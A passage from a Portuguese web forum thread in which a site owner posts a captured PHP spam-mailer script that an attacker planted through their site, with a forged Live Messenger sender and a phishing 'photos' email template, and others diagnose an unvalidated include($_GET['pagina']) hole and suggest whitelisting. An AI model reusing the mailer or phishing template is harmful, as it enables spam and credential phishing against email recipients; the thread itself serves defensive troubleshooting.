
Spammer Insistente Usando Meu Site
#16
Posted 26/03/2008, 12:21
Cruzando as respostas, você encontrará o foco do problema.
Muller Dias
ex-administrador Fórum WMO
#17
Posted 09/03/2009, 17:10
Depois de muito tempo o xxxxxx voltou a atacar, eis os novos dados do safado.

O novo Código capturado é:
<?php set_time_limit(0); if($manda) { //EMAIL DO DESTINAT?RIO $destinatario = "$remetente"; //ASSUNTO DO EMAIL $assunto = "$assunto"; //MENSAGEM DO EMAIL $mensagem = $html; $mensagem = stripslashes($mensagem); //CABE?ALHO DO EMAIL $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; /* headers adicionais */ $headers .= "From:<$remetente>\r\n"; $headers .= "Cc: $remetente\r\n"; $headers .= "Bcc: e$remetente\r\n"; //ARQUIVO COM OS EMAILS $arquivo = $lista; //LENDO ARQUIVO $file = explode("\n", $arquivo); $i = 1; ?><title>spamer priv thundercash</title> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <p> </p> <? if($manda) { ?> <table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333"> <tr> <td bgcolor="#f5f5f5"> <? foreach ($file as $mail) { if(mail($mail, $assunto, $mensagem, $headers)) echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>"; else echo "* $i ".$email[$i]." <font color=red>Não foi!</font><br><hr>"; $i++; } } ?> </td> </tr> </table><? } ?> <form name="form1" method="post" action=""> <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666"> <tr> <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b> </b></font></div></td> </tr> <tr> <td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td> <td width="1%" bgcolor="#616666"> </td> <td width="78%"> <input name="assunto" type="text" id="assunto3" size="50" value="FOTOS"></td> </tr> <tr> <td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td> <td bgcolor="#66623666"> </td> <td> <input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td> </tr> <tr> <td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td> <td bgcolor="#6666366"> </td> <td><textarea name="html" cols="30" rows="4" id="textarea2"> <html> <head> <p><font face=Arial size=3>Oie!!<br> tudo bem? eu esqueci de mandar as fotos! agora ta ai!!<br> Beijao!<br> <p>anexo: <p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto01.jpg (185kb) <p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto02.jpg (183kb) <p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto03.jpg (178kb) </a></font></p> </body> </html> </textarea></td> </tr> <tr> <td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td> <td bgcolor="#6666266"> </td> <td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td> </tr> <tr> <td><div align="center"></div></td> <td bgcolor="#6662666"> </td> <td> </td> </tr> <tr> <td> </td> <td bgcolor="#6626666"> </td> <td><div align="center"> <input name="manda" type="submit" id="manda" value="Send!"> </div></td> </tr> <tr> <td height="23"> </td> <td bgcolor="#6662666"> </td> <td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <b></b></font></div></td> </tr> </table></td> </tr> </table> </form>
O que leva para o seguinte formulário:

Olhei no DreamWeaver e o código gera o seguinte E-mail:

Alguém tem uma solução?
Edição feita por: '' sem.Ponto, 10/03/2009, 08:38.
#18
Posted 11/03/2009, 00:51
Daqui eu estou vendo a brecha que você deixou, o site está mal programado. O código para abertura das páginas internas do seu site deve estar mais ou menos assim:
$pagina = $_GET['pagina']; include $pagina;
Aí para abrir uma página interna, creio que o link fica assim: www.seusite.com.br/index.php?pagina=pagina.php
Estou certo?
Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.

Muller Dias
ex-administrador Fórum WMO
#19
Posted 12/03/2009, 10:34
O dream weaver realmente ajuda muita coisa, mas não deixe q ele faça todo o trabalho.
#20
Posted 12/03/2009, 10:37
Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.
Como eu faço isso?
#21
Posted 13/03/2009, 00:00
Você pode usar apenas condicional, switch, função in_array()...
Qualquer dúvida, poste em PHP.

Muller Dias
ex-administrador Fórum WMO
#22
Posted 13/03/2009, 14:31
Quer saber? Apaguei meu site e estou fazendo outro...

Esse primeiro verifiquei, o arquivo windows.txt
Existem várias formas de fazer isso...
Você pode usar apenas condicional, switch, função in_array()...
Qualquer dúvida, poste em PHP.
Agora que percebi uma parada, teu nick é sem.ponto e o site mencionado acima veio através do www.semponto.com.br, por um acaso era tu fazendo isso também?

#23
Posted 13/03/2009, 19:38

Todos esses aí eu era eu testando, o estranho é que eu não ví "includando" os arquivos.

Muller Dias
ex-administrador Fórum WMO
1 user(s) are reading this topic
0 membro(s), 1 visitante(s) e 0 membros anônimo(s)